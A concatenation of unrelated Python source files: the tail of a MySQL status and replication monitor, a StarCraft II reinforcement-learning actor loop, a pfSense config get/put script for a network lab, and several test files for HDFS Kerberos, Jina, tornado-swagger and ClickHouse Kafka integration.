values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);"
param = (
instance.ip, int(instance.port), connect, role, uptime, version, max_connections, max_connect_errors, open_files_limit,
table_open_cache, max_tmp_tables, max_heap_table_size, max_allowed_packet, open_files, open_tables,
threads_connected, threads_running, threads_created, threads_cached, connections, aborted_clients,
aborted_connects, connections_persecond, bytes_received_persecond, bytes_sent_persecond, com_select_persecond,
com_insert_persecond, com_update_persecond, com_delete_persecond, com_commit_persecond, com_rollback_persecond,
questions_persecond, queries_persecond, transaction_persecond, created_tmp_tables_persecond,
created_tmp_disk_tables_persecond, created_tmp_files_persecond, table_locks_immediate_persecond,
table_locks_waited_persecond, key_buffer_size, sort_buffer_size, join_buffer_size, key_blocks_not_flushed,
key_blocks_unused, key_blocks_used, key_read_requests_persecond, key_reads_persecond, key_write_requests_persecond,
key_writes_persecond, innodb_version, innodb_buffer_pool_instances, innodb_buffer_pool_size, innodb_doublewrite,
innodb_file_per_table, innodb_flush_log_at_trx_commit, innodb_flush_method, innodb_force_recovery,
innodb_io_capacity, innodb_read_io_threads, innodb_write_io_threads, innodb_buffer_pool_pages_total,
innodb_buffer_pool_pages_data, innodb_buffer_pool_pages_dirty, innodb_buffer_pool_pages_flushed,
innodb_buffer_pool_pages_free, innodb_buffer_pool_pages_misc, innodb_page_size, innodb_pages_created,
innodb_pages_read, innodb_pages_written, innodb_row_lock_current_waits, innodb_buffer_pool_pages_flushed_persecond,
innodb_buffer_pool_read_requests_persecond, innodb_buffer_pool_reads_persecond,
innodb_buffer_pool_write_requests_persecond, innodb_rows_read_persecond, innodb_rows_inserted_persecond,
innodb_rows_updated_persecond, innodb_rows_deleted_persecond, query_cache_hitrate, thread_cache_hitrate,
key_buffer_read_rate, key_buffer_write_rate, key_blocks_used_rate, created_tmp_disk_tables_rate,
connections_usage_rate, open_files_usage_rate, open_tables_usage_rate,now_time,instance.ip, int(instance.port))
# print param
if not MysqlStatus.objects.filter(db_ip=instance.ip,db_port=instance.port).exists():
mysql_exec(sql_insert, param[:-2])
else:
mysql_exec(sql_update, param)
mysql_exec(sql2,param[:-2])
if mysql_monitor.check_connections:
alarm_type = 6
if mysql_monitor.connection_threshold <= int(threads_connected):
if record_alarm(mysql_monitor,alarm_type):
sendmail_monitor.delay(instance.id, mysql_monitor.mail_to.split(';'), threads_connected,alarm_type)
else:
check_ifok(instance, alarm_type)
# check mysql connected
connected = cur.execute("select SUBSTRING_INDEX(host,':',1) as connect_server, user connect_user,db connect_db, count(SUBSTRING_INDEX(host,':',1)) as connect_count from information_schema.processlist where db is not null and db!='information_schema' and db !='performance_schema' group by connect_server,connect_user,connect_db;");
if connected:
for line in cur.fetchall():
sql = "insert into mysql_connected(db_ip,db_port,connect_server,connect_user,connect_db,connect_count,create_time) values(%s,%s,%s,%s,%s,%s,%s);"
param = (instance.ip, int(instance.port),line[0], line[1], line[2], line[3],now_time)
mysql_exec(sql, param)
#check replication
master_thread=cur.execute("select * from information_schema.processlist where COMMAND = 'Binlog Dump' or COMMAND = 'Binlog Dump GTID';")
slave_status=cur.execute('show slave status;')
datalist=[]
if master_thread >= 1:
datalist.append(int(1))
if slave_status <> 0:
datalist.append(int(1))
else:
datalist.append(int(0))
else:
datalist.append(int(0))
if slave_status <> 0:
datalist.append(int(1))
else:
datalist.append(int(0))
sql="delete from mysql_replication where db_ip=%s and db_port=%s;"
param =(instance.ip,instance.port)
mysql_exec(sql,param)
if slave_status <> 0:
gtid_mode=cur.execute("select * from information_schema.global_variables where variable_name='gtid_mode';")
result=cur.fetchone()
if result:
gtid_mode=result[1]
else:
gtid_mode='OFF'
datalist.append(gtid_mode)
read_only=cur.execute("select * from information_schema.global_variables where variable_name='read_only';")
result=cur.fetchone()
datalist.append(result[1])
#slave_info=cur.execute('show slave status;')
if instance.replchannel <> '0':
slave_info=cur.execute("show slave status for channel '%s';" %(instance.replchannel))
else :
slave_info=cur.execute('show slave status;')
result=cur.fetchone()
# print "result"
# print slave_info
master_server=result[1]
master_port=result[3]
slave_io_run=result[10]
slave_sql_run=result[11]
delay=result[32]
current_binlog_file=result[9]
current_binlog_pos=result[21]
master_binlog_file=result[5]
master_binlog_pos=result[6]
try:
slave_sQL_rnning_state=result[44]
except Exception,e:
slave_sQL_running_state="NULL"
datalist.append(master_server)
datalist.append(master_port)
datalist.append(slave_io_run)
datalist.append(slave_sql_run)
datalist.append(delay)
datalist.append(current_binlog_file)
datalist.append(current_binlog_pos)
datalist.append(master_binlog_file)
datalist.append(master_binlog_pos)
datalist.append(0)
datalist.append(slave_sQL_rnning_state)
if instance.check_slave:
if (slave_io_run == "Yes") and (slave_sql_run == "Yes"):
alarm_type = 4
check_ifok(instance, alarm_type)
if instance.check_delay :
alarm_type = 5
if instance.delay_threshold <=int(delay) :
if record_alarm(instance,alarm_type):
sendmail_monitor.delay(instance.id, mysql_monitor.mail_to.split(';'),delay,alarm_type)
else:
check_ifok(instance, alarm_type)
else:
alarm_type = 4
if record_alarm(instance,alarm_type):
sendmail_monitor.delay(instance.id, mysql_monitor.mail_to.split(';'),{'iothread':slave_io_run,'sqlthread':slave_sql_run}, alarm_type)
elif master_thread >= 1:
gtid_mode=cur.execute("select * from information_schema.global_variables where variable_name='gtid_mode';")
result=cur.fetchone()
if result:
gtid_mode=result[1]
else:
gtid_mode='OFF'
datalist.append(gtid_mode)
read_only=cur.execute("select * from information_schema.global_variables where variable_name='read_only';")
result=cur.fetchone()
datalist.append(result[1])
datalist.append('---')
datalist.append('---')
datalist.append('---')
datalist.append('---')
datalist.append('---')
datalist.append('---')
datalist.append('---')
master=cur.execute('show master status;')
master_result=cur.fetchone()
datalist.append(master_result[0])
datalist.append(master_result[1])
binlog_file=cur.execute('show master logs;')
binlogs=0
if binlog_file:
for row in cur.fetchall():
binlogs = binlogs + row[1]
datalist.append(binlogs)
datalist.append('---')
else:
datalist=[]
result=datalist
if result:
datalist.append(now_time)
sql= "update mysql_replication set db_ip=%s,db_port=%s,is_master=%s,is_slave=%s,gtid_mode=%s,read_only=%s,master_server=%s,master_port=%s,slave_io_run=%s,slave_sql_run=%s,delay=%s,current_binlog_file=%s,current_binlog_pos=%s,master_binlog_file=%s,master_binlog_pos=%s,master_binlog_space=%s,slave_sql_running_state=%s,create_time where db_ip=%s and db_port=%s"
sql2= "insert into mysql_replication_his(db_ip,db_port,is_master,is_slave,gtid_mode,read_only,master_server,master_port,slave_io_run,slave_sql_run,delay,current_binlog_file,current_binlog_pos,master_binlog_file,master_binlog_pos,master_binlog_space,slave_sql_running_state,create_time) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
param=(instance.ip,instance.port,result[0],result[1],result[2],result[3],result[4],result[5],result[6],result[7],result[8],result[9],result[10],result[11],result[12],result[13],result[14],result[15],instance.ip,instance.port)
mysql_exec(sql,param)
mysql_exec(sql2, param[:-2])
cur.close()
conn.close()
# except Exception, e:
except MySQLdb.Error, e:
print e
time.sleep(3)
try:
conn = MySQLdb.connect(host=instance.ip, user=db_account.user, passwd=py.decrypt(db_account.passwd), port=int(instance.port), connect_timeout=3, charset='utf8')
cur = conn.cursor()
conn.select_db('information_schema')
except MySQLdb.Error, e:
connect = 0
downserver = MysqlStatus.objects.filter(db_ip=instance.ip, db_port=int(instance.port))[:1]
# now_time = now_time + datetime.timedelta(hours=8)
if downserver:
downserver[0].connect = 0
downserver[0].create_time = now_time
downserver[0].save()
else:
downserver = MysqlStatus(db_ip=instance.ip, db_port=int(instance.port),version='-1',create_time=now_time)
downserver.save()
alarm_type = 7
if record_alarm(mysql_monitor, alarm_type):
sendmail_monitor.delay(instance.id, mysql_monitor.mail_to.split(';'), alarm_type,alarm_type)
# sendmail_monitor(instance.id, mysql_monitor.mail_to.split(';'), alarm_type, alarm_type)
def get_mysql_status(cursor):
data=cursor.execute('show global status;');
data_list=cursor.fetchall()
data_dict={}
for item in data_list:
data_dict[item[0]] = item[1]
return data_dict
def get_mysql_variables(cursor):
cursor.execute('show global variables;')
data_list=cursor.fetchall()
data_dict={}
for item in data_list:
data_dict[item[0]] = item[1]
return data_dict
def get_mysql_version(cursor):
cursor.execute('select version();');
return cursor.fetchone()[0]
def get_item(data_dict,item):
try:
item_value = data_dict[item]
return item_value
except:
return '-1'
|
actor_plus_z.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
" The code for the actor using Z (the reward for imititing the expert in replays) in the actor-learner mode in the IMPALA architecture "
# modified from AlphaStar pseudo-code
import traceback
from time import time, sleep, strftime, localtime
import threading
import torch
from torch.optim import Adam
from pysc2.env.sc2_env import SC2Env, AgentInterfaceFormat, Agent, Race
from alphastarmini.core.rl.env_utils import SC2Environment, get_env_outcome
from alphastarmini.core.rl.utils import Trajectory, get_supervised_agent
from alphastarmini.core.rl.learner import Learner
from alphastarmini.core.rl import utils as U
from alphastarmini.lib import utils as L
# below packages are for test
from alphastarmini.core.ma.league import League
from alphastarmini.core.ma.coordinator import Coordinator
from alphastarmini.lib.hyper_parameters import Arch_Hyper_Parameters as AHP
from alphastarmini.lib.hyper_parameters import Training_Races as TR
from alphastarmini.lib.hyper_parameters import AlphaStar_Agent_Interface_Format_Params as AAIFP
# for replay reward
import os
import random
from pysc2.lib import point
from pysc2.lib import features as F
from pysc2 import run_configs
from s2clientprotocol import sc2api_pb2 as sc_pb
__author__ = "Ruo-Ze Liu"
debug = False
STEP_MUL = 8 # 1
GAME_STEPS_PER_EPISODE = 18000 # 9000
MAX_EPISODES = 1000 # 100
# gpu setting
ON_GPU = torch.cuda.is_available()
DEVICE = torch.device("cuda:0" if ON_GPU else "cpu")
torch.backends.cudnn.enabled = False
class ActorLoopPlusZ:
"""A single actor loop that generates trajectories.
We don't use batched inference here, but it was used in practice.
TODO: implement the batched version
"""
def __init__(self, player, coordinator, max_time_for_training = 60 * 60 * 24,
max_time_per_one_opponent=60 * 60 * 2,
max_frames_per_episode=22.4 * 60 * 15, max_frames=22.4 * 60 * 60 * 24,
max_episodes=MAX_EPISODES, use_replay_expert_reward=True,
replay_path="data/Replays/filtered_replays_1/", replay_version='3.16.1'):
self.player = player
self.player.add_actor(self)
if ON_GPU:
self.player.agent.agent_nn.to(DEVICE)
self.teacher = get_supervised_agent(player.race, model_type="sl")
if ON_GPU:
self.teacher.agent_nn.to(DEVICE)
# below code is not used because we only can create the env when we know the opponnet information (e.g., race)
# AlphaStar: self.environment = SC2Environment()
self.coordinator = coordinator
self.max_time_for_training = max_time_for_training
self.max_time_per_one_opponent = max_time_per_one_opponent
self.max_frames_per_episode = max_frames_per_episode
self.max_frames = max_frames
self.max_episodes = max_episodes
self.thread = threading.Thread(target=self.run, args=())
self.thread.daemon = True # Daemonize thread
self.is_running = True
self.is_start = False
self.use_replay_expert_reward = use_replay_expert_reward
self.replay_path = replay_path
self.replay_version = replay_version
def start(self):
self.is_start = True
self.thread.start()
# background
def run(self):
try:
self.is_running = True
"""A run loop to have agents and an environment interact."""
total_frames = 0
total_episodes = 0
results = [0, 0, 0]
start_time = time()
print("start_time before training:", strftime("%Y-%m-%d %H:%M:%S", localtime(start_time)))
while time() - start_time < self.max_time_for_training:
self.opponent, _ = self.player.get_match()
agents = [self.player, self.opponent]
# if self.use_replay_expert_reward:
run_config = run_configs.get(version=self.replay_version) # the replays released by blizzard are all 3.16.1 version
with self.create_env(self.player, self.opponent) as env:
# set the obs and action spec
observation_spec = env.observation_spec()
action_spec = env.action_spec()
for agent, obs_spec, act_spec in zip(agents, observation_spec, action_spec):
agent.setup(obs_spec, act_spec)
self.teacher.setup(self.player.agent.obs_spec, self.player.agent.action_spec)
print('player:', self.player) if debug else None
print('opponent:', self.opponent) if debug else None
print('teacher:', self.teacher) if 1 else None
trajectory = []
start_time = time() # in seconds.
print("start_time before reset:", strftime("%Y-%m-%d %H:%M:%S", localtime(start_time)))
# one opponent match (may include several games) defaultly lasts for no more than 2 hour
while time() - start_time < self.max_time_per_one_opponent:
# Note: the pysc2 environment don't return z
# AlphaStar: home_observation, away_observation, is_final, z = env.reset()
total_episodes += 1
print("total_episodes:", total_episodes)
timesteps = env.reset()
for a in agents:
a.reset()
# check the condition that the replay is over but the game is not
with run_config.start(full_screen=False) as controller:
# here we must use the with ... as ... statement, or it will cause an error
#controller = run_config.start(full_screen=False)
# start replay reward
raw_affects_selection = False
raw_crop_to_playable_area = False
screen_resolution = point.Point(64, 64)
minimap_resolution = point.Point(64, 64)
camera_width = 24
interface = sc_pb.InterfaceOptions(
raw=True,
score=True,
# Omit to disable.
feature_layer=sc_pb.SpatialCameraSetup(width=camera_width),
# Omit to disable.
render=None,
# By default cloaked units are completely hidden. This shows some details.
show_cloaked=False,
# By default burrowed units are completely hidden. This shows some details for those that produce a shadow.
show_burrowed_shadows=False,
# Return placeholder units (buildings to be constructed), both for raw and feature layers.
show_placeholders=False,
# see below
raw_affects_selection=raw_affects_selection,
# see below
raw_crop_to_playable_area=raw_crop_to_playable_area
)
screen_resolution.assign_to(interface.feature_layer.resolution)
minimap_resolution.assign_to(interface.feature_layer.minimap_resolution)
replay_files = os.listdir(self.replay_path)
# random select a replay file from the candidate replays
random.shuffle(replay_files)
replay_path = self.replay_path + replay_files[0]
print('replay_path:', replay_path)
replay_data = run_config.replay_data(replay_path)
start_replay = sc_pb.RequestStartReplay(
replay_data=replay_data,
options=interface,
disable_fog=False, # FLAGS.disable_fog
observed_player_id=1, # FLAGS.observed_player
map_data=None,
realtime=False
)
controller.start_replay(start_replay)
feat = F.features_from_game_info(game_info=controller.game_info(),
use_feature_units=True, use_raw_units=True,
use_unit_counts=True, use_raw_actions=True,
show_cloaked=True, show_burrowed_shadows=True,
show_placeholders=True)
replay_obs = None
replay_bo = []
replay_o = controller.observe()
replay_obs = feat.transform_obs(replay_o)
# end replay reward
[home_obs, away_obs] = timesteps
is_final = home_obs.last()
player_memory = self.player.agent.initial_state()
opponent_memory = self.opponent.agent.initial_state()
teacher_memory = self.teacher.initial_state()
# initial build order
player_bo = []
episode_frames = 0
# default outcome is 0 (means draw)
outcome = 0
# in one episode (game)
#
start_episode_time = time() # in seconds.
print("start_episode_time before is_final:", strftime("%Y-%m-%d %H:%M:%S", localtime(start_episode_time)))
while not is_final:
total_frames += 1
episode_frames += 1
# run_loop: actions = [agent.step(timestep) for agent, timestep in zip(agents, timesteps)]
player_step = self.player.agent.step_logits(home_obs, player_memory)
player_function_call, player_action, player_logits, player_new_memory = player_step
print("player_function_call:", player_function_call) if debug else None
opponent_step = self.opponent.agent.step_logits(away_obs, opponent_memory)
opponent_function_call, opponent_action, opponent_logits, opponent_new_memory = opponent_step
# Q: how to do it ?
# teacher_logits = self.teacher(home_obs, player_action, teacher_memory)
# may change implemention of teacher_logits
teacher_step = self.teacher.step_logits(home_obs, teacher_memory)
teacher_function_call, teacher_action, teacher_logits, teacher_new_memory = teacher_step
print("teacher_function_call:", teacher_function_call) if debug else None
env_actions = [player_function_call, opponent_function_call]
player_action_spec = action_spec[0]
action_masks = U.get_mask(player_action, player_action_spec)
z = None
timesteps = env.step(env_actions)
[home_next_obs, away_next_obs] = timesteps
# print the observation of the agent
# print("home_obs.observation:", home_obs.observation)
reward = home_next_obs.reward
print("reward: ", reward) if debug else None
is_final = home_next_obs.last()
# calculate the build order
player_bo = L.calculate_build_order(player_bo, home_obs.observation, home_next_obs.observation)
print("player build order:", player_bo) if debug else None
# calculate the unit counts of bag
player_ucb = L.calculate_unit_counts_bow(home_obs.observation).reshape(-1).numpy().tolist()
print("player unit count of bow:", sum(player_ucb)) if debug else None
# start replay_reward
# note the controller should step the same steps as with the rl actor (keep the time as the same)
controller.step(STEP_MUL)
replay_next_o = controller.observe()
replay_next_obs = feat.transform_obs(replay_next_o)
# calculate the build order for replay
replay_bo = L.calculate_build_order(replay_bo, replay_obs, replay_next_obs)
print("replay build order:", player_bo) if debug else None
# calculate the unit counts of bag for replay
replay_ucb = L.calculate_unit_counts_bow(replay_obs).reshape(-1).numpy().tolist()
print("replay unit count of bow:", sum(replay_ucb)) if debug else None
# end replay_reward
game_loop = home_obs.observation.game_loop[0]
print("game_loop", game_loop)
# note, original AlphaStar pseudo-code has some mistakes, we modified
# them here
traj_step = Trajectory(
observation=home_obs.observation,
opponent_observation=away_obs.observation,
memory=player_memory,
z=z,
masks=action_masks,
action=player_action,
behavior_logits=player_logits,
teacher_logits=teacher_logits,
is_final=is_final,
reward=reward,
build_order=player_bo,
z_build_order=replay_bo, # we change it to the sampled build order
unit_counts=player_ucb,
z_unit_counts=replay_ucb, # we change it to the sampled unit counts
game_loop=game_loop,
)
trajectory.append(traj_step)
player_memory = tuple(h.detach() for h in player_new_memory)
opponent_memory = tuple(h.detach() for h in opponent_new_memory)
teacher_memory = tuple(h.detach() for h in teacher_new_memory)
home_obs = home_next_obs
away_obs = away_next_obs
# for replay reward
replay_obs = replay_next_obs
replay_o = replay_next_o
if is_final:
outcome = reward
print("outcome: ", outcome) if 1 else None
results[outcome + 1] += 1
if len(trajectory) >= AHP.sequence_length:
trajectories = U.stack_namedtuple(trajectory)
if self.player.learner is not None:
if self.player.learner.is_running:
print("Learner send_trajectory!")
self.player.learner.send_trajectory(trajectories)
trajectory = []
else:
print("Learner stops!")
print("Actor also stops!")
return
# use max_frames to end the loop
# whether to stop the run
if self.max_frames and total_frames >= self.max_frames:
print("Beyond the max_frames, return!")
return
# use max_frames_per_episode to end the episode
if self.max_frames_per_episode and episode_frames >= self.max_frames_per_episode:
print("Beyond the max_frames_per_episode, break!")
break
# end of replay
if replay_o.player_result:
print(replay_o.player_result)
break
self.coordinator.send_outcome(self.player, self.opponent, outcome)
# use max_frames_per_episode to end the episode
if self.max_episodes and total_episodes >= self.max_episodes:
print("Beyond the max_episodes, return!")
print("results: ", results) if 1 else None
print("win rate: ", results[2] / (1e-8 + sum(results))) if 1 else None
return
# close the replays
except Exception as e:
print("ActorLoop.run() Exception cause return, Detials of the Exception:", e)
print(traceback.format_exc())
finally:
self.is_running = False
# create env function
def create_env(self, player, opponent, game_steps_per_episode=GAME_STEPS_PER_EPISODE,
step_mul=STEP_MUL, version=None,
# the map should be the same as in the expert replay
map_name="AbyssalReef", random_seed=1):
player_aif = AgentInterfaceFormat(**AAIFP._asdict())
opponent_aif = AgentInterfaceFormat(**AAIFP._asdict())
agent_interface_format = [player_aif, opponent_aif]
# create env
print('map name:', map_name)
print('player.name:', player.name)
print('opponent.name:', opponent.name)
print('player.race:', player.race)
print('opponent.race:', opponent.race)
env = SC2Env(map_name=map_name,
players=[Agent(player.race, player.name),
Agent(opponent.race, opponent.name)],
step_mul=step_mul,
game_steps_per_episode=game_steps_per_episode,
agent_interface_format=agent_interface_format,
version=version,
random_seed=random_seed)
return env
|
config_pfsense.py
|
#!/usr/bin/env python3
# scripts/config_pfsense.py
#
# Import/Export script for vIOS.
#
# @author Alain Degreffe <[email protected]>
# @copyright 2016 Alain Degreffe
# @license http://www.gnu.org/licenses/gpl.html
# @link http://www.unetlab.com/
# @version 20160422
import getopt, multiprocessing, os, pexpect, re, sys, time
conntimeout = 3 # Maximum time for console connection
expctimeout = 3 # Maximum time for each short expect
longtimeout = 30 # Maximum time for each long expect
timeout = 60 # Maximum run time (conntimeout is included)
def node_login(handler):
# Send an empty line, and wait for the login prompt
i = -1
while i == -1:
try:
handler.sendline('\r\n')
i = handler.expect([
'Enter an option:',
'.*root.*:'], timeout = 5)
except:
i = -1
if i == 0:
# Need to send username and password
handler.sendline('8')
try:
handler.expect('.*root.*:', timeout = expctimeout)
return True
except:
print('ERROR: error waiting for "root:" prompt.')
node_quit(handler)
return False
elif i == 1:
# nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
def node_quit(handler):
if handler.isalive() == True:
handler.sendline('exit\n')
handler.close()
def config_get(handler):
# Getting the config
handler.setwinsize(100, 120)
handler.sendline('cat /conf/config.xml | awk \'{print $0}\'\n')
#handler.sendline('cat `ls -rt /conf/backup/config-* | tail -1 `\n')
try:
handler.expect('</pfsense>', timeout = longtimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
config = handler.before.decode()
# Manipulating the config
config = re.sub('\r', '', config, flags=re.DOTALL) # Unix style
config = config + '</pfsense>\n';
config = re.sub('.*<\?xml version=\"1.0\"\?>', '<?xml version=\"1.0\"?>', config, flags=re.DOTALL) # Header
return config
def config_put(handler):
while True:
try:
i = handler.expect('Do you want to set up VLANs now.*', timeout)
break
except:
return False
handler.sendline('')
handler.sendline('\n')
handler.sendline('mount -t cd9660 /dev/cd0 /mnt\n')
handler.sendline('cp /mnt/config.xml /conf/\n')
handler.sendline('exit\n')
while True:
try:
i = handler.expect('option:', timeout)
except:
return False
return True
def usage():
print('Usage: %s <standard options>' %(sys.argv[0]));
print('Standard Options:');
print('-a <s> *Action can be:')
print(' - get: get the startup-configuration and push it to a file')
print(' - put: put the file as startup-configuration')
print('-f <s> *File');
print('-p <n> *Console port');
print('-t <n> Timeout (default = %i)' %(timeout));
print('* Mandatory option')
def now():
# Return current UNIX time in milliseconds
return int(round(time.time() * 1000))
def main(action, fiename, port):
try:
# Connect to the device
tmp = conntimeout
while (tmp > 0):
handler = pexpect.spawn('telnet 127.0.0.1 %i' %(port))
time.sleep(0.1)
tmp = tmp - 0.1
if handler.isalive() == True:
break
if (handler.isalive() != True):
print('ERROR: cannot connect to port "%i".' %(port))
node_quit(handler)
sys.exit(1)
if action == 'get':
rc = node_login(handler)
if rc != True:
print('ERROR: failed to login.')
node_quit(handler)
sys.exit(1)
config = config_get(handler)
if config in [False, None]:
print('ERROR: failed to retrieve config.')
node_quit(handler)
sys.exit(1)
try:
fd = open(filename, 'a')
fd.write(config)
fd.close()
except:
print('ERROR: cannot write config to file.')
node_quit(handler)
sys.exit(1)
elif action == 'put':
rc = config_put(handler)
if rc != True:
print('ERROR: failed to push config.')
node_quit(handler)
sys.exit(1)
# Remove lock file
lock = '%s/.lock' %(os.path.dirname(filename))
if os.path.exists(lock):
os.remove(lock)
# Mark as configured
configured = '%s/.configured' %(os.path.dirname(filename))
if not os.path.exists(configured):
open(configured, 'a').close()
node_quit(handler)
sys.exit(0)
except Exception as e:
print('ERROR: got an exception')
print(type(e)) # the exception instance
print(e.args) # arguments stored in .args
print(e) # __str__ allows args to be printed directly,
node_quit(handler)
return False
if __name__ == "__main__":
action = None
filename = None
port = None
# Getting parameters from command line
try:
opts, args = getopt.getopt(sys.argv[1:], 'a:p:t:f:', ['action=', 'port=', 'timeout=', 'file='])
except getopt.GetoptError as e:
usage()
sys.exit(3)
for o, a in opts:
if o in ('-a', '--action'):
action = a
elif o in ('-f', '--file'):
filename = a
elif o in ('-p', '--port'):
try:
port = int(a)
except:
port = -1
elif o in ('-t', '--timeout'):
try:
timeout = int(a) * 1000
except:
timeout = -1
else:
print('ERROR: invalid parameter.')
# Checking mandatory parameters
if action == None or port == None or filename == None:
usage()
print('ERROR: missing mandatory parameters.')
sys.exit(1)
if action not in ['get', 'put']:
usage()
print('ERROR: invalid action.')
sys.exit(1)
if timeout < 0:
usage()
print('ERROR: timeout must be 0 or higher.')
sys.exit(1)
if port < 0:
usage()
print('ERROR: port must be 32768 or higher.')
sys.exit(1)
if action == 'get' and os.path.exists(filename):
usage()
print('ERROR: destination file already exists.')
sys.exit(1)
if action == 'put' and not os.path.exists(filename):
usage()
print('ERROR: source file does not already exist.')
sys.exit(1)
if action == 'put':
try:
fd = open(filename, 'r')
config = fd.read()
fd.close()
except:
usage()
print('ERROR: cannot read from file.')
sys.exit(1)
# Backgrounding the script
end_before = now() + timeout
p = multiprocessing.Process(target=main, name="Main", args=(action, filename, port))
p.start()
while (p.is_alive() and now() < end_before):
# Waiting for the child process to end
time.sleep(1)
if p.is_alive():
# Timeout occurred
print('ERROR: timeout occurred.')
p.terminate()
sys.exit(127)
if p.exitcode != 0:
sys.exit(127)
sys.exit(0)
|
test_ext_kerberos.py
|
#!/usr/bin/env python
# encoding: utf-8
"""Test Kerberos extension."""
from nose.tools import eq_, nottest, ok_, raises
from threading import Lock, Thread
from time import sleep, time
import sys
class MockHTTPKerberosAuth(object):
def __init__(self, **kwargs):
self._lock = Lock()
self._calls = set()
self._items = []
def __call__(self, n):
with self._lock:
ok_(not self._items)
self._items.append(n)
sleep(0.25)
with self._lock:
thread = self._items.pop()
eq_(thread, n)
self._calls.add(thread)
class MockModule(object):
def __init__(self):
self.HTTPKerberosAuth = MockHTTPKerberosAuth
sys.modules['requests_kerberos'] = MockModule()
from hdfs.ext.kerberos import _HdfsHTTPKerberosAuth
class TestKerberosClient(object):
def test_max_concurrency(self):
auth = _HdfsHTTPKerberosAuth(1, mutual_auth='OPTIONAL')
t1 = Thread(target=auth.__call__, args=(1, ))
t1.start()
t2 = Thread(target=auth.__call__, args=(2, ))
t2.start()
t1.join()
t2.join()
eq_(auth._calls, set([1, 2]))
|
test_remote.py
|
import threading
import time
import unittest
from jina.logging import get_logger
from jina.parser import set_gateway_parser, set_pea_parser
from jina.peapods.pod import GatewayPod
from jina.peapods.remote import PeaSpawnHelper
from tests import JinaTestCase
class MyTestCase(JinaTestCase):
def test_logging_thread(self):
_event = threading.Event()
logger = get_logger('mytest', event_trigger=_event)
def _print_messages():
while True:
_event.wait()
print(f'thread: {_event.record}')
print(type(_event.record))
_event.clear()
t = threading.Thread(target=_print_messages)
t.daemon = True
t.start()
logger.info('blah, blah')
logger.info('blah, blah, blah')
time.sleep(.1)
logger.warning('warn, warn, warn')
time.sleep(.1)
logger.debug('warn, warn, warn')
time.sleep(.1)
logger.success('crit')
time.sleep(.1)
def tearDown(self) -> None:
time.sleep(2)
super().tearDown()
def test_remote_not_allowed(self):
f_args = set_gateway_parser().parse_args([])
p_args = set_pea_parser().parse_args(['--host', 'localhost', '--port-expose', str(f_args.port_expose)])
with GatewayPod(f_args):
PeaSpawnHelper(p_args).start()
def test_cont_gateway(self):
f1_args = set_gateway_parser().parse_args(['--allow-spawn'])
f2_args = set_gateway_parser().parse_args([])
with GatewayPod(f1_args):
pass
with GatewayPod(f2_args):
pass
if __name__ == '__main__':
unittest.main()
|
test_setup.py
|
import multiprocessing
import socket
import time
from contextlib import closing
import pytest
import tornado.httpclient
import tornado.ioloop
import tornado.web
from tornado_swagger.setup import export_swagger, setup_swagger
SERVER_START_TIMEOUT = 3
SWAGGER_URL = "/api/doc"
def find_free_port():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
class ExampleHandler(tornado.web.RequestHandler):
def get(self):
"""
Description end-point
---
tags:
- Example
summary: Create user
description: This can only be done by the logged in user.
operationId: examples.api.api.createUser
produces:
- application/json
"""
self.write({})
class Application(tornado.web.Application):
routes = [tornado.web.url(r"/api/example", ExampleHandler)]
def __init__(self):
setup_swagger(
self.routes,
swagger_url=SWAGGER_URL,
)
super(Application, self).__init__(self.routes)
def test_export_swagger():
assert export_swagger(Application.routes)
def server_holder(port):
app = Application()
app.listen(port=port)
tornado.ioloop.IOLoop.current().start()
@pytest.fixture()
def server():
port = find_free_port()
server_holder_process = multiprocessing.Process(target=server_holder, args=(port,))
server_holder_process.start()
time.sleep(SERVER_START_TIMEOUT)
yield port
server_holder_process.terminate()
server_holder_process.join()
def test_swagger_setup_integration(server):
client = tornado.httpclient.HTTPClient()
response = client.fetch("http://localhost:{0}{1}".format(server, SWAGGER_URL))
assert "Swagger UI" in response.body.decode()
@pytest.fixture()
def swaggered_app():
return Application()
|
test.py
|
import json
import os.path as p
import random
import socket
import subprocess
import threading
import time
import io
import avro.schema
import avro.io
import avro.datafile
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
from confluent_kafka import admin
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer
from kafka.admin import NewTopic
"""
protoc --version
libprotoc 3.0.0
# to create kafka_pb2.py
protoc --python_out=. kafka.proto
"""
from . import kafka_pb2
from . import social_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml', 'configs/log_conf.xml'],
with_kafka=True,
with_zookeeper=True,
macros={"kafka_broker":"kafka1",
"kafka_topic_old":"old",
"kafka_group_name_old":"old",
"kafka_topic_new":"new",
"kafka_group_name_new":"new",
"kafka_client_id":"instance",
"kafka_format_json_each_row":"JSONEachRow"},
clickhouse_path_dir='clickhouse_path')
kafka_id = ''
# Helpers
def check_kafka_is_available():
p = subprocess.Popen(('docker',
'exec',
'-i',
kafka_id,
'/usr/bin/kafka-broker-api-versions',
'--bootstrap-server',
'INSIDE://localhost:9092'),
stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def wait_kafka_is_available(max_retries=50):
retries = 0
while True:
if check_kafka_is_available():
break
else:
retries += 1
if retries > max_retries:
raise "Kafka is not available"
